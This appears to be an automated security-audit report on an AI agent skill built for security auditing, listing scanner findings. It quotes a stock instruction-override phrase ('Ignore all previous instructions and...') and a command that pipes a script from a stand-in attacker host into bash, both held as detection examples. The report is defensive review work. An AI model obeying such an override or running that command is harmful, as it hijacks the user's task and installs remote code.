claw skill security audit

AdvisoryAudited by Static analysis on May 10, 2026.

Overview

Detected: suspicious.prompt_injection_instructions

Findings (3)

Artifact-based informational review of SKILL.md, metadata, install specs, static scan signals, and capability signals. ClawScan does not execute the skill or run runtime probes.

NoteHigh Confidence
ASI01: Agent Goal Hijack
What this means

Automated scanners may flag these phrases, but the visible context shows they are examples used for security auditing.

Why it was flagged

This phrase is present in a section labeled as dangerous instruction-override examples for security review, not as a command for the skill to follow.

Skill content
"Ignore all previous instructions and..."
Recommendation

Keep such examples clearly fenced and labeled as untrusted examples so the agent does not treat them as authoritative instructions.

What this means

The skill contains dangerous command strings, but they are reference examples; there is no artifact evidence that the skill runs them.

Why it was flagged

The file includes executable attack commands as examples of malicious download and execution patterns to detect during audits.

Skill content
"curl https://evil.com/backdoor.sh | bash"
Recommendation

Treat these commands as detection examples only and avoid executing commands copied from reference material.

What this means

Security reports may remain on disk and could expose sensitive findings to anyone with access to the workspace.

Why it was flagged

The skill may create local audit artifacts, which could persist sensitive findings such as hardcoded secrets or security notes.

Skill content
Store artifacts in `.shield_security/` directory
Recommendation

Review what is written to .shield_security/, redact secrets in reports, and delete audit artifacts when no longer needed.

What this means

It is harder to independently verify the publisher or review history, although this skill has no installable code in the provided artifacts.

Why it was flagged

The registry metadata does not provide an external source or homepage for independent provenance review.

Skill content
Source: unknown; Homepage: none
Recommendation

Install only if you trust the registry publisher, and verify the full SKILL.md content before use.

Findings (3)

warn

suspicious.prompt_injection_instructions

Location
references/prompt-injection-patterns.md:15
Finding
Prompt-injection style instruction pattern detected.
warn

suspicious.prompt_injection_instructions

Location
references/vulnerability-patterns.md:15
Finding
Prompt-injection style instruction pattern detected.
warn

suspicious.prompt_injection_instructions

Location
SKILL.md:41
Finding
Prompt-injection style instruction pattern detected.